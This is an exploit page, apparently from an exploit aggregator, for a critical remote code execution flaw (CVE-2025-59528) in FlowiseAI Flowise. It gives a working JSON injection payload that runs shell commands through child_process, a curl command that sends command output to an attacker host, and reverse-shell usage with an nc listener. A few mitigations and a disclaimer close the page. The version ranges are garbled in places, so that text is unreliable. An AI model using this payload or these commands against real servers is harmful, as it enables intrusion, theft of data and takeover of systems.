Exploit for Code Injection in Flowiseai Flowise CVE-2025-59528

## https://sploitus.com/exploit?id=0BE42E60-0AF7-5A6A-BDE6-3B3550243F5B
# CVE-2025-59528 - FlowiseAI CustomMCP Remote Code Execution

**CVSS 10.0 (Critical)** | **Blind RCE** | **FlowiseAI Flowise >= 2.2.7-patch.1 and = 2.2.7-patch.1, = 3.0.1 |

### Payload

```json
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "{x:(function(){const cp=process.mainModule.require('child_process');cp.exec('COMMAND',()=>{});return 1;})()}"
  }
}
```

## Usage

```bash
pip install requests
```

### Check if target is vulnerable (time-based)
```bash
python3 exploit.py -t http://target:3000 --mode check --email user@email.com --password pass
```

### Blind command execution
```bash
# Exfiltrate output via callback
python3 exploit.py -t http://target:3000 --mode exec \
  -c "curl http://ATTACKER:PORT/\$(id | base64)" \
  --email user@email.com --password pass
```

### Reverse shell
```bash
# Start listener
nc -lvnp 4444

# Fire exploit (auto-tries bash, nc, python)
python3 exploit.py -t http://target:3000 --mode revshell \
  --lhost ATTACKER_IP --lport 4444 \
  --email user@email.com --password pass
```

### Authentication options

```bash
# JWT auth (Flowise >= 3.0.1)
--email user@email.com --password pass

# Basic auth (Flowise = 3.0.6
- **Restrict** API access via firewall/VPN
- **Enable** authentication on all instances
- **Monitor** logs for POST requests to `/api/v1/node-load-method/customMCP`

## References

- [NVD — CVE-2025-59528](https://nvd.nist.gov/vuln/detail/CVE-2025-59528)
- [GitHub Advisory — GHSA-3gcm-f6qx-ff7p](https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p)
- [SonicWall Threat Analysis](https://www.sonicwall.com)
- [Fix Commit — Flowise v3.0.6](https://github.com/FlowiseAI/Flowise/releases/tag/v3.0.6)

## Disclaimer

This tool is provided for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.